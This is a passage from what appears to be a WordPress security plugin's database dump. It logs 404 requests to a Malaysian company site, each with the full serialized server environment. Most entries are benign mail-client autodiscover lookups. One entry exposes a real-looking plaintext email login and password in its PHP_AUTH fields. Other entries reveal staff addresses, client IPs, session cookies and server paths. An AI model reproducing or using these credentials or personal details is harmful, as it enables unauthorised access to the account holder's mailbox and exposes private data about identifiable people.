;s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbERAKw5Jlat30Wq3qoYvAAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571885312.156\";s:12:\"REQUEST_TIME\";s:10:\"1571885312\";}}','notice','2019-10-24 02:48:35','2019-10-24 02:48:32',35743912,37538960,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.118.212'),(28885,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:63:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:3:\"7-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"4A122005-FF13-4F97-B072-F87CC347CC9A\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.30.1013\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:3:\"7-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbEeT6w5Jlat30Wq3qokCwAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.216\";s:11:\"REMOTE_PORT\";s:5:\"50310\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbEeT6w5Jlat30Wq3qokCwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571888719.4452\";s:12:\"REQUEST_TIME\";s:10:\"1571888719\";}}','notice','2019-10-24 03:45:21','2019-10-24 03:45:19',35284544,37087000,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.63.216'),(28886,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"AF353928-4BEB-423B-A450-B7F051853494\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbEk-4mVmdgDIdj8xQAn@gAAAkY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"118.101.92.88\";s:11:\"REMOTE_PORT\";s:5:\"52874\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbEk-4mVmdgDIdj8xQAn@gAAAkY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571890431.6013\";s:12:\"REQUEST_TIME\";s:10:\"1571890431\";}}','notice','2019-10-24 04:13:53','2019-10-24 04:13:52',35274552,37085312,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'118.101.92.88'),(28887,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"A241BF1D-9C0E-4B9B-B573-674C51D1BD62\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbFE@YmVmdgDIdj8xQAzZAAAAkk\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.145.63.216\";s:11:\"REMOTE_PORT\";s:5:\"50997\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbFE@YmVmdgDIdj8xQAzZAAAAkk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571898617.2117\";s:12:\"REQUEST_TIME\";s:10:\"1571898617\";}}','notice','2019-10-24 06:30:19','2019-10-24 06:30:17',35276208,37072888,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.63.216'),(28888,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"57768\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbFLjYmVmdgDIdj8xQA1VQAAAlA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571900302.0666\";s:12:\"REQUEST_TIME\";s:10:\"1571900302\";}}','notice','2019-10-24 06:58:24','2019-10-24 06:58:22',34916488,36714760,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(28889,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:72:\"text/html,application/xhtml+xml,application/xml,image/*;q=0.9,*/*; q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:19:\"utf-8;q=0.7,*;q=0.7\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.5,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:5:\"Close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.154.168.193\";s:11:\"REMOTE_PORT\";s:5:\"56859\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbFPm8k@05cSct0OyUhiAgAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571901339.5365\";s:12:\"REQUEST_TIME\";s:10:\"1571901339\";}}','notice','2019-10-24 07:15:42','2019-10-24 07:15:40',35413200,37221560,'https://bintara.com.my/?page_id=18',1,0,'195.154.168.193'),(28890,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"374\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:25:\"HTTP_MS_ASPROTOCOLVERSION\";s:3:\"2.5\";s:15:\"HTTP_USER_AGENT\";s:41:\"Android-Mail/2019.09.15.270135155.release\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:19:\"HTTP_X_MS_POLICYKEY\";s:1:\"0\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:11:\"PHP_AUTH_PW\";s:15:\"Adiana_20302011\";s:13:\"PHP_AUTH_USER\";s:19:\"adif@bintara.com.my\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbFVlck@05cSct0OyUhnrwAAAIE\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"113.210.185.198\";s:11:\"REMOTE_PORT\";s:4:\"1540\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbFVlck@05cSct0OyUhnrwAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571902869.7035\";s:12:\"REQUEST_TIME\";s:10:\"1571902869\";}}','notice','2019-10-24 07:41:12','2019-10-24 07:41:10',35276448,37074208,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'113.210.185.198'),(28891,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{51F77D01-69D9-49B9-AE95-9161388DC74E}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:57:\"OutlookSession=\\\"{377695D1-47FA-40D0-8B83-8E9879EAE8F5}\\\"\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:20:\"sales@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"ainaa@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbFYGf5cHc@dX2BdZ46RGQAAAA4\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"110.159.79.128\";s:11:\"REMOTE_PORT\";s:5:\"15938\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbFYGf5cHc@dX2BdZ46RGQAAAA4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571903513.3122\";s:12:\"REQUEST_TIME\";s:10:\"1571903513\";}}','notice','2019-10-24 07:51:56','2019-10-24 07:51:53',35669672,37470216,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'110.159.79.128'),(28892,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:74:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-admin.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"145-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:251:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wp-settings-time-1=1570071531; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 